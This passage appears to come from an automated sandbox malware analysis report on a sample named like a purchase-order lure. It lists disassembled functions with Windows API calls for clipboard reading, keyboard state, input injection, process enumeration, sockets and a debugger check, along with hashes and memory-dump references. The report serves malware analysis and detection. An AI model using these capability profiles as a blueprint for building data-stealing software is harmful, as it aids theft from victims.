                                  • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                  • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                  Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                  • API String ID: 0-2872873767
                                  • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                  • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                  • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                  • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                  Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windownativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                  • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                  • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                  • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                  • NtdllDialogWndProc_W.USER32(?,00000005,?,?), ref: 00440817
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSendWindow$DialogInvalidateMetricsMoveNtdllProc_RectShowSystem
                                  • String ID:
                                  • API String ID: 2044739998-0
                                  • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                  • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                  • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                  • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                  Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                  • __wsplitpath.LIBCMT ref: 00475644
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcscat.LIBCMT ref: 00475657
                                  • __wcsicoll.LIBCMT ref: 0047567B
                                  • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                  • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                  • String ID:
                                  • API String ID: 2547909840-0
                                  • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                  • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                  • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                  • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                  Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                  • Sleep.KERNEL32(0000000A), ref: 0045250B
                                  • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                  • FindClose.KERNEL32(?), ref: 004525FF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                  • String ID: *.*$\VH
                                  • API String ID: 2786137511-2657498754
                                  • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                  • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                  • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                  • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                  Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                  • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                  • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID: pqI
                                  • API String ID: 2579439406-2459173057
                                  • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                  • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                  • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                  • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                  Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                  Download Yara Rule
                                  APIs
                                  • __wcsicoll.LIBCMT ref: 00433349
                                  • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                  • __wcsicoll.LIBCMT ref: 00433375
                                  • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wcsicollmouse_event
                                  • String ID: DOWN
                                  • API String ID: 1033544147-711622031
                                  • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                  • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                  • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                  • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                  Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0044C3D2
                                  • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                  • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                  • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: KeyboardMessagePostState$InputSend
                                  • String ID:
                                  • API String ID: 3031425849-0
                                  • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                  • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                  • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                  • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                  Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                  • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                  • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorLastinet_addrsocket
                                  • String ID:
                                  • API String ID: 4170576061-0
                                  • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                  • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                  • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                  • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                  Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windownativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCursorPos.USER32(?), ref: 004478E2
                                  • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                  • NtdllDialogWndProc_W.USER32(?,0000007B,?,?), ref: 0044791D
                                  • GetCursorPos.USER32(00000000), ref: 0044796A
                                  • TrackPopupMenuEx.USER32(019E63D0,00000000,00000000,?,?,00000000), ref: 00447991
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CursorMenuPopupTrack$DialogNtdllProc_
                                  • String ID:
                                  • API String ID: 192203443-0
                                  • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                  • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                  • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                  • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                  Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetClientRect.USER32(?,?), ref: 004479CC
                                  • GetCursorPos.USER32(?), ref: 004479D7
                                  • ScreenToClient.USER32(?,?), ref: 004479F3
                                  • WindowFromPoint.USER32(?,?), ref: 00447A34
                                  • NtdllDialogWndProc_W.USER32(?,00000020,?,?), ref: 00447AAD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Client$CursorDialogFromNtdllPointProc_RectScreenWindow
                                  • String ID:
                                  • API String ID: 4176674648-0
                                  • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                  • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                  • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                  • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                  Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                  • IsWindowVisible.USER32 ref: 0047A368
                                  • IsWindowEnabled.USER32 ref: 0047A378
                                  • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                  • IsIconic.USER32 ref: 0047A393
                                  • IsZoomed.USER32 ref: 0047A3A1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                  • String ID:
                                  • API String ID: 292994002-0
                                  • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                  • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                  • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                  • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                  Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetParent.USER32(?), ref: 004503C8
                                  • NtdllDialogWndProc_W.USER32(?,00000138,?,?), ref: 00450417
                                  • NtdllDialogWndProc_W.USER32(?,00000133,?,?), ref: 00450466
                                  • NtdllDialogWndProc_W.USER32(?,00000134,?,?), ref: 00450497
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllProc_$Parent
                                  • String ID:
                                  • API String ID: 3146699748-0
                                  • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                  • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                  • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                  • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                  Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenClipboard.USER32(?), ref: 0046DCE7
                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                  • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                  • CloseClipboard.USER32 ref: 0046DD0D
                                  • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                  • CloseClipboard.USER32 ref: 0046DD41
                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                  • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                  • CloseClipboard.USER32 ref: 0046DD99
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                  • String ID:
                                  • API String ID: 15083398-0
                                  • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                  • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                  • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                  • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                  Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: U$\
                                  • API String ID: 4104443479-100911408
                                  • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                  • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                  • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                  • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                  Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                  Download Yara Rule
                                  APIs
